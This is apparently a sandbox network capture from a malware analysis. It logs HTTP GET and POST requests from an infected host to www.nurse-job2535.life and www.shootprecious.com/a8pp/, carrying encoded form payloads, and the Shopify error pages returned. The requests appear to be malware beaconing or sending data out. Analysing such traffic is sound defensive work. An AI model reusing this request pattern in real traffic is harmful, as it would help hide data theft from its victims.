                                        Jun 4, 2024 14:39:30.783164978 CEST472OUTGET /a8pp/?2NlhHLS8=ZUQ1TL0seNvx54VLi4j8goKVXeEHsH3HvniJXC80qaRkGy2/Bav7bR6THbfzZ3GDEHeASBxbKXGg0EinUgac1wLiet4LPvLUzSGHrF52u0MP0A2xTBnpXUY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:39:31.012324095 CEST107INHTTP/1.1 436
                                        date: Tue, 04 Jun 2024 12:39:30 GMT
                                        content-length: 0
                                        server: NginX
                                        connection: close


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        78192.168.11.304987223.227.38.7480
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:36.139025927 CEST748OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Origin: http://www.shootprecious.com
                                        Referer: http://www.shootprecious.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 55 6f 49 78 44 41 45 4e 56 36 49 56 79 6e 77 6e 59 68 57 66 35 58 4b 43 56 4b 47 35 71 36 5a 7a 66 75 4b 79 42 78 4c 57 46 37 46 63 61 58 44 43 31 49 56 63 4a 48 4c 57 66 37 55 46 68 6c 36 30 44 44 34 79 70 34 4c 76 49 69 4e 4b 51 69 41 74 74 69 50 79 69 73 69 67 71 2b 4f 5a 6e 4e 57 71 45 39 2b 52 6f 48 76 39 71 72 54 56 63 66 30 52 54 2f 65 46 67 56 45 48 63 55 67 6f 6a 71 6f 39 54 36 65 44 49 36 61 58 4c 6d 48 59 54 63 47 61 43 69 53 4f 44 74 43 77 79 36 43 32 39 37 76 68 51 70 41 61 77 57 49 5a 36 2f 51 44 68 77 4f 2b 44 48 69 50 68 45 53 2f 47 4e 6a 4e 4b 48 53 56 39 51 3d 3d
                                        Data Ascii: 2NlhHLS8=UoIxDAENV6IVynwnYhWf5XKCVKG5q6ZzfuKyBxLWF7FcaXDC1IVcJHLWf7UFhl60DD4yp4LvIiNKQiAttiPyisigq+OZnNWqE9+RoHv9qrTVcf0RT/eFgVEHcUgojqo9T6eDI6aXLmHYTcGaCiSODtCwy6C297vhQpAawWIZ6/QDhwO+DHiPhES/GNjNKHSV9Q==
                                        Jun 4, 2024 14:39:36.340501070 CEST1289INHTTP/1.1 402 Payment Required
                                        Date: Tue, 04 Jun 2024 12:39:36 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        x-frame-options: DENY
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        x-request-id: eea0610b-6f4a-4632-9ea9-1469db8dac61-1717504776
                                        server-timing: processing;dur=10
                                        content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=eea0610b-6f4a-4632-9ea9-1469db8dac61-1717504776
                                        x-content-type-options: nosniff
                                        x-download-options: noopen
                                        x-permitted-cross-domain-policies: none
                                        x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=eea0610b-6f4a-4632-9ea9-1469db8dac61-1717504776
                                        x-dc: gcp-us-east1,gcp-us-central1,gcp-us-central1
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WEXjsE4gHwpRMveKTEdY7vyiyosKQEI5%2B1LEu9OEqjRLCFpL0OGR0V2i5cVNy7A7oKLq%2BpRBb0ZogYabsPCfHBuRf4PHEUe0stVVfmzmqK2KtNLRHEyleyn%2FuvteBTW
                                        Data Raw:
                                        Data Ascii:
                                        Jun 4, 2024 14:39:36.340539932 CEST256INData Raw: 51 65 4c 73 65 6c 66 71 45 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30
                                        Data Ascii: QeLselfqEg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=82.999945Server: cloudflareCF-RAY: 88e7fc934aa3135d-ATLalt-svc: h3=":443";
                                        Jun 4, 2024 14:39:36.340603113 CEST1289INData Raw: 39 35 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 53 6f 6d
                                        Data Ascii: 95f<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Something went wrong.</title> <meta name="referrer" content="never" /> <style type="text/css"> * { border:0; margin:0; padding:0; -moz-box-sizing:border-
                                        Jun 4, 2024 14:39:36.340679884 CEST1117INData Raw: 77 72 61 70 70 65 72 20 7b 20 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 36 35 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 7d 0a 0a 20 20 20 20 20 20
                                        Data Ascii: wrapper { min-width:320px; max-width:650px; margin:0 auto; padding:20px; } .hero { margin-bottom:30px; } .content--block { position:relative; margin-bottom:50px; } .content--desc { margin-bottom:32px; position:relative; }
                                        Jun 4, 2024 14:39:36.344685078 CEST1289INData Raw: 31 30 30 30 0d 0a 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3a 73 6b 65 74 63 68 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 68 65 6d 69 61 6e 63 6f 64 69 6e 67 2e 63
                                        Data Ascii: 1000ink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancoding.com/sketch/ns"> <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd" sketch:type="MSPage"> <g id="temporary-errors" sketch:
                                        Jun 4, 2024 14:39:36.344768047 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 37 31 2e 31 31 36 30 31 32 34 2c 34 32 2e 38 36 38 35 32 38 33 20 4c 31 33 35 2e 37 34 34 30 36 35 2c 33 37 2e 32 36 38 38 33 30 32 22 20 69 64 3d 22 46 69 6c 6c 2d 36 22 20 66 69 6c 6c
                                        Data Ascii: <path d="M71.1160124,42.8685283 L135.744065,37.2688302" id="Fill-6" fill="#FFFFFF" sketch:type="MSShapeGroup"></path> <path d="M71.1160124,42.8685283 L135.744065,37.2688302" id="Stroke-7" stroke="#B4B5B4" stroke-width="2"
                                        Jun 4, 2024 14:39:36.344810963 CEST1289INData Raw: 39 37 33 35 38 20 31 34 38 2e 34 31 38 32 36 36 2c 34 32 2e 36 31 33 38 31 31 33 20 4c 31 34 38 2e 34 31 38 32 36 36 2c 34 32 2e 36 31 33 38 31 31 33 20 5a 22 20 69 64 3d 22 53 74 72 6f 6b 65 2d 38 22 20 73 74 72 6f 6b 65 3d 22 23 42 34 42 35 42
                                        Data Ascii: 97358 148.418266,42.6138113 L148.418266,42.6138113 Z" id="Stroke-8" stroke="#B4B5B4" stroke-width="2" stroke-linecap="round" sketch:type="MSShapeGroup"></path> <path d="M205.044344,43.8398491 L4.39898452,61.2733585" id="Fill-9" fil
                                        Jun 4, 2024 14:39:36.344860077 CEST237INData Raw: 2c 31 31 33 2e 36 32 34 31 35 31 20 43 38 32 2e 39 33 30 34 38 36 31 2c 31 30 38 2e 35 39 30 39 34 33 20 38 30 2e 33 38 35 38 38 32 34 2c 31 30 36 2e 30 33 39 30 31 39 20 37 36 2e 39 39 37 38 32 33 35 2c 31 30 36 2e 30 33 39 30 31 39 20 43 37 34
                                        Data Ascii: ,113.624151 C82.9304861,108.590943 80.3858824,106.039019 76.9978235,106.039019 C74.3474489,106.039019 72.0360836,107.642038 71.6150341,107.951094 C69.6250495,112.722792 67.8811858,114.945962 66.1312198,114.945962 C64.4626161,114.945962
                                        Jun 4, 2024 14:39:36.347004890 CEST1289INData Raw: 66 66 61 0d 0a 20 36 33 2e 32 36 35 32 33 35 33 2c 31 31 32 2e 39 37 34 31 31 33 20 36 32 2e 31 30 37 31 37 39 36 2c 31 31 31 2e 30 36 36 37 39 32 20 43 36 31 2e 38 38 32 37 35 35 34 2c 31 31 30 2e 36 39 37 32 38 33 20 36 31 2e 36 36 31 37 32 31
                                        Data Ascii: ffa 63.2652353,112.974113 62.1071796,111.066792 C61.8827554,110.697283 61.6617214,110.333208 61.4420433,109.993585 C60.9314954,109.202943 60.7992817,108.364075 61.0494706,107.500755 C61.7539319,105.073811 65.3128514,103.209962 66.1291858,102
                                        Jun 4, 2024 14:39:36.347029924 CEST1289INData Raw: 32 34 39 31 20 39 34 2e 30 35 34 37 33 36 38 2c 31 33 33 2e 35 34 39 31 33 32 20 38 38 2e 34 30 30 30 36 31 39 2c 31 34 31 2e 38 33 32 35 32 38 20 43 38 32 2e 38 38 37 37 37 30 39 2c 31 34 39 2e 39 30 38 30 37 35 20 37 33 2e 32 36 31 39 34 31 32
                                        Data Ascii: 2491 94.0547368,133.549132 88.4000619,141.832528 C82.8877709,149.908075 73.2619412,154.924302 63.2801517,154.924302 C61.1654118,154.924302 59.0628762,154.696755 57.0308545,154.247774 C55.1859659,153.840226 53.4271858,153.633736 51.8040093,153.
                                        Jun 4, 2024 14:39:36.347081900 CEST1289INData Raw: 38 30 2e 31 33 30 39 34 37 34 2c 31 34 35 2e 37 37 33 35 30 39 20 38 38 2e 38 38 36 32 30 31 32 2c 31 32 35 2e 39 31 33 30 35 37 20 38 34 2e 38 37 39 31 31 31 35 2c 31 31 33 2e 35 31 38 38 36 38 20 43 38 32 2e 38 37 38 39 35 36 37 2c 31 30 37 2e
                                        Data Ascii: 80.1309474,145.773509 88.8862012,125.913057 84.8791115,113.518868 C82.8789567,107.330943 79.7465108,105.699396 76.9978235,105.699396 C73.9284334,105.699396 71.3377245,107.735094 71.3377245,107.735094 C69.1972198,112.892604 67.525904,114.60634


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        79192.168.11.304987323.227.38.7480
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:38.779052973 CEST768OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Origin: http://www.shootprecious.com
                                        Referer: http://www.shootprecious.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 55 6f 49 78 44 41 45 4e 56 36 49 56 7a 48 67 6e 56 67 57 66 34 33 4b 42 4c 36 47 35 6a 61 59 62 66 75 32 79 42 7a 6d 4f 45 4f 64 63 61 33 54 43 36 73 4a 63 4f 48 4c 57 56 62 55 41 73 46 36 2f 44 44 30 4c 70 34 33 76 49 69 5a 4b 51 6a 77 74 75 56 37 78 6a 38 69 69 79 4f 4f 48 36 39 57 71 45 39 2b 52 6f 48 4c 58 71 76 2f 56 63 76 45 52 54 61 69 47 73 31 45 41 4b 6b 67 6f 77 36 6f 35 54 36 65 39 49 37 47 74 4c 6b 76 59 54 64 61 61 42 7a 53 4e 49 74 43 79 76 71 44 45 34 59 4b 46 4a 71 38 37 2b 32 6b 68 31 63 49 77 70 48 2f 6b 65 45 57 4e 79 6b 75 53 61 4d 4f 6c 49 46 54 4f 67 62 75 74 4f 6b 51 30 37 78 35 6d 34 6f 6b 71 75 4f 59 57 48 61 34 3d
                                        Data Ascii: 2NlhHLS8=UoIxDAENV6IVzHgnVgWf43KBL6G5jaYbfu2yBzmOEOdca3TC6sJcOHLWVbUAsF6/DD0Lp43vIiZKQjwtuV7xj8iiyOOH69WqE9+RoHLXqv/VcvERTaiGs1EAKkgow6o5T6e9I7GtLkvYTdaaBzSNItCyvqDE4YKFJq87+2kh1cIwpH/keEWNykuSaMOlIFTOgbutOkQ07x5m4okquOYWHa4=
                                        Jun 4, 2024 14:39:39.016335964 CEST1289INHTTP/1.1 402 Payment Required
                                        Date: Tue, 04 Jun 2024 12:39:38 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        x-frame-options: DENY
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        x-request-id: c2b32b18-fc27-44ec-8bd4-ecd246ad4c70-1717504778
                                        server-timing: processing;dur=45
                                        content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=c2b32b18-fc27-44ec-8bd4-ecd246ad4c70-1717504778
                                        x-content-type-options: nosniff
                                        x-download-options: noopen
                                        x-permitted-cross-domain-policies: none
                                        x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=c2b32b18-fc27-44ec-8bd4-ecd246ad4c70-1717504778
                                        x-dc: gcp-us-east1,gcp-us-central1,gcp-us-central1
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SpXzYt42aEinuaEf4SulD%2BqrCgJ7LnWQODKN64BVAdRujIFrWZgMZQ2YBBUwG2RaaIAlHDyKeefoU6YcYs6ucRmPKuLjvVG4qjtzDb3NPTffVvpE0BmJt3ROmyBdsjCcyOi
                                        Data Raw:
                                        Data Ascii:
                                        Jun 4, 2024 14:39:39.016354084 CEST253INData Raw: 51 58 6b 69 72 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c
                                        Data Ascii: QXkirA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=119.999886Server: cloudflareCF-RAY: 88e7fca3c9db44e5-ATLalt-svc: h3=":443"; ma
                                        Jun 4, 2024 14:39:39.016390085 CEST1289INData Raw: 39 36 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 53 6f 6d
                                        Data Ascii: 960<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Something went wrong.</title> <meta name="referrer" content="never" /> <style type="text/css"> * { border:0; margin:0; padding:0; -moz-box-sizing:border-
                                        Jun 4, 2024 14:39:39.016442060 CEST1118INData Raw: 77 72 61 70 70 65 72 20 7b 20 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 36 35 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 7d 0a 0a 20 20 20 20 20 20
                                        Data Ascii: wrapper { min-width:320px; max-width:650px; margin:0 auto; padding:20px; } .hero { margin-bottom:30px; } .content--block { position:relative; margin-bottom:50px; } .content--desc { margin-bottom:32px; position:relative; }
                                        Jun 4, 2024 14:39:39.019067049 CEST1289INData Raw: 66 66 61 0d 0a 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3a 73 6b 65 74 63 68 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 68 65 6d 69 61 6e 63 6f 64 69 6e 67 2e 63 6f 6d
                                        Data Ascii: ffank="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancoding.com/sketch/ns"> <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd" sketch:type="MSPage"> <g id="temporary-errors" sketch:ty
                                        Jun 4, 2024 14:39:39.019171000 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 37 31 2e 31 31 36 30 31 32 34 2c 34 32 2e 38 36 38 35 32 38 33 20 4c 31 33 35 2e 37 34 34 30 36 35 2c 33 37 2e 32 36 38 38 33 30 32 22 20 69 64 3d 22 46 69 6c 6c 2d 36 22 20 66 69 6c 6c 3d 22
                                        Data Ascii: <path d="M71.1160124,42.8685283 L135.744065,37.2688302" id="Fill-6" fill="#FFFFFF" sketch:type="MSShapeGroup"></path> <path d="M71.1160124,42.8685283 L135.744065,37.2688302" id="Stroke-7" stroke="#B4B5B4" stroke-width="2" s
                                        Jun 4, 2024 14:39:39.019239902 CEST1289INData Raw: 33 35 38 20 31 34 38 2e 34 31 38 32 36 36 2c 34 32 2e 36 31 33 38 31 31 33 20 4c 31 34 38 2e 34 31 38 32 36 36 2c 34 32 2e 36 31 33 38 31 31 33 20 5a 22 20 69 64 3d 22 53 74 72 6f 6b 65 2d 38 22 20 73 74 72 6f 6b 65 3d 22 23 42 34 42 35 42 34 22
                                        Data Ascii: 358 148.418266,42.6138113 L148.418266,42.6138113 Z" id="Stroke-8" stroke="#B4B5B4" stroke-width="2" stroke-linecap="round" sketch:type="MSShapeGroup"></path> <path d="M205.044344,43.8398491 L4.39898452,61.2733585" id="Fill-9" fill=
                                        Jun 4, 2024 14:39:39.019275904 CEST230INData Raw: 31 33 2e 36 32 34 31 35 31 20 43 38 32 2e 39 33 30 34 38 36 31 2c 31 30 38 2e 35 39 30 39 34 33 20 38 30 2e 33 38 35 38 38 32 34 2c 31 30 36 2e 30 33 39 30 31 39 20 37 36 2e 39 39 37 38 32 33 35 2c 31 30 36 2e 30 33 39 30 31 39 20 43 37 34 2e 33
                                        Data Ascii: 13.624151 C82.9304861,108.590943 80.3858824,106.039019 76.9978235,106.039019 C74.3474489,106.039019 72.0360836,107.642038 71.6150341,107.951094 C69.6250495,112.722792 67.8811858,114.945962 66.1312198,114.945962 C64.4626161,114.9
                                        Jun 4, 2024 14:39:39.019525051 CEST11INData Raw: 36 0d 0a 34 35 39 36 32 20 0d 0a
                                        Data Ascii: 645962
                                        Jun 4, 2024 14:39:39.023550987 CEST1289INData Raw: 66 66 61 0d 0a 36 33 2e 32 36 35 32 33 35 33 2c 31 31 32 2e 39 37 34 31 31 33 20 36 32 2e 31 30 37 31 37 39 36 2c 31 31 31 2e 30 36 36 37 39 32 20 43 36 31 2e 38 38 32 37 35 35 34 2c 31 31 30 2e 36 39 37 32 38 33 20 36 31 2e 36 36 31 37 32 31 34
                                        Data Ascii: ffa63.2652353,112.974113 62.1071796,111.066792 C61.8827554,110.697283 61.6617214,110.333208 61.4420433,109.993585 C60.9314954,109.202943 60.7992817,108.364075 61.0494706,107.500755 C61.7539319,105.073811 65.3128514,103.209962 66.1291858,102.
                                        Jun 4, 2024 14:39:39.023597002 CEST1289INData Raw: 34 39 31 20 39 34 2e 30 35 34 37 33 36 38 2c 31 33 33 2e 35 34 39 31 33 32 20 38 38 2e 34 30 30 30 36 31 39 2c 31 34 31 2e 38 33 32 35 32 38 20 43 38 32 2e 38 38 37 37 37 30 39 2c 31 34 39 2e 39 30 38 30 37 35 20 37 33 2e 32 36 31 39 34 31 32 2c
                                        Data Ascii: 491 94.0547368,133.549132 88.4000619,141.832528 C82.8877709,149.908075 73.2619412,154.924302 63.2801517,154.924302 C61.1654118,154.924302 59.0628762,154.696755 57.0308545,154.247774 C55.1859659,153.840226 53.4271858,153.633736 51.8040093,153.6


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        80192.168.11.304987423.227.38.7480
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:41.418387890 CEST1685OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Origin: http://www.shootprecious.com
                                        Referer: http://www.shootprecious.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 55 6f 49 78 44 41 45 4e 56 36 49 56 7a 48 67 6e 56 67 57 66 34 33 4b 42 4c 36 47 35 6a 61 59 62 66 75 32 79 42 7a 6d 4f 45 4e 39 63 61 6c 72 43 31 74 4a 63 50 48 4c 57 4f 62 55 42 73 46 36 59 44 44 64 44 70 34 37 2f 49 67 68 4b 52 42 34 74 6d 41 58 78 71 38 69 69 75 2b 4f 47 6e 4e 57 7a 45 39 4f 56 6f 48 37 58 71 76 2f 56 63 73 63 52 48 66 65 47 71 31 45 48 63 55 67 30 6a 71 6f 42 54 36 48 47 49 37 54 50 4c 55 50 59 53 35 36 61 48 42 4b 4e 46 74 43 73 73 71 44 63 34 59 32 61 4a 71 67 33 2b 32 41 4c 31 65 6f 77 73 43 36 48 43 6c 53 72 74 6b 36 62 5a 64 32 4a 43 79 37 4e 68 6f 2b 43 41 6b 46 50 73 41 68 6f 78 49 74 2b 35 50 63 64 53 50 41 74 53 58 78 5a 44 44 61 74 33 4a 64 46 6c 50 67 48 2b 68 59 38 7a 36 72 43 6c 30 7a 52 34 71 70 4d 78 70 65 49 59 78 48 6b 70 2b 51 6f 5a 6e 74 7a 58 35 69 34 58 38 6d 6c 77 61 4e 6c 69 65 74 4b 45 72 67 75 4b 62 6d 66 31 30 68 6d 52 6f 54 37 56 62 33 65 52 76 5a 6d 50 59 41 71 58 59 2f 33 54 38 44 65 72 50 6a 30 34 31 61 70 6f 72 54 51 49 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=UoIxDAENV6IVzHgnVgWf43KBL6G5jaYbfu2yBzmOEN9calrC1tJcPHLWObUBsF6YDDdDp47/IghKRB4tmAXxq8iiu+OGnNWzE9OVoH7Xqv/VcscRHfeGq1EHcUg0jqoBT6HGI7TPLUPYS56aHBKNFtCssqDc4Y2aJqg3+2AL1eowsC6HClSrtk6bZd2JCy7Nho+CAkFPsAhoxIt+5PcdSPAtSXxZDDat3JdFlPgH+hY8z6rCl0zR4qpMxpeIYxHkp+QoZntzX5i4X8mlwaNlietKErguKbmf10hmRoT7Vb3eRvZmPYAqXY/3T8DerPj041aporTQIuJVSGOV4C3M9HXh3WO4bUUP8n0XtRqUwkT5aV7gO8uxkas3NTqpf8APAoj2SA/swPHUfQ1LqUnmK9SnBveOOetT16GeffecKNQ7kSJorXzwCAK3TLUvjJ+aXaTMdxuSkOVOIx/ox8T6sXkpdOd+KoqV+7raaOui4MIJwLNcVJf6tu1r/r5AqcdO0PEYYCoaVgy3Ioqwq3CcBJ1JAGnl0Gnwwm9wHaV3sgsmbCIh01LAsXjQ60pKjnOMRKEX7zRgAtzvdy1cZmTm39o77av40ZXFhWuZ0FPfEttSlT/4ItFn75aD76bGPeNDAk6jscr4c1SRslG1G2ggAnOIfvKU6t2S9ontp2Mgp5XYwhYXvdcqmRB7PjNJfI5Jh8yE/C7Gcwp3jJGZUUcG8ebA2w2MVC/rHhS+OSKqekrUj4+NfCB/x+0AzZyKIBRoJbHi41C3VubgIxk5XLsCKauzbh+RzzrS0UZX1ar8E8/XAbNM447Ya/32/z2j44NeoKR4ElOVRj70nJ21/VD6IFw6CYaFkhuEgFMScLNf6Ctty2PQaNXrv7ELOfmQ/dbO8rFBzXn/Ur7OVlC9H2GEVoAcAa3poZpsXbquvgk7pA004CTihJDUPnCdLlcGJpAbE06br/oM/bGa8z/xfqgrBy1QCEkRwYzH0cTZ/f/f2yf [TRUNCATED]
                                        Jun 4, 2024 14:39:41.713315964 CEST1289INHTTP/1.1 402 Payment Required
                                        Date: Tue, 04 Jun 2024 12:39:41 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        x-frame-options: DENY
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        x-request-id: b97b4955-fbe5-4d04-be7e-2a02c7a4a286-1717504781
                                        server-timing: processing;dur=47
                                        content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b97b4955-fbe5-4d04-be7e-2a02c7a4a286-1717504781
                                        x-content-type-options: nosniff
                                        x-download-options: noopen
                                        x-permitted-cross-domain-policies: none
                                        x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b97b4955-fbe5-4d04-be7e-2a02c7a4a286-1717504781
                                        x-dc: gcp-us-east1,gcp-us-central1,gcp-us-central1
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qlco%2BlQ6hFNysQsqB46Is34qIzUecMxEdikN7wxQZ1lTAIm1XygyCV3Eu%2BDiGk3ntg5NX3lkt3m3PMJ4xVuhV3ow5nrObUp9epWvabl12rtxMdAOECqviu%2FgQZM1cTG
                                        Data Raw:
                                        Data Ascii:
                                        Jun 4, 2024 14:39:41.713335991 CEST257INData Raw: 34 69 78 6a 69 33 46 48 34 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30
                                        Data Ascii: 4ixji3FH4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=175.999880Server: cloudflareCF-RAY: 88e7fcb44c8e6758-ATLalt-svc: h3=":443"
                                        Jun 4, 2024 14:39:41.713370085 CEST1289INData Raw: 32 39 36 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 53 6f
                                        Data Ascii: 2960<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Something went wrong.</title> <meta name="referrer" content="never" /> <style type="text/css"> * { border:0; margin:0; padding:0; -moz-box-sizing:border
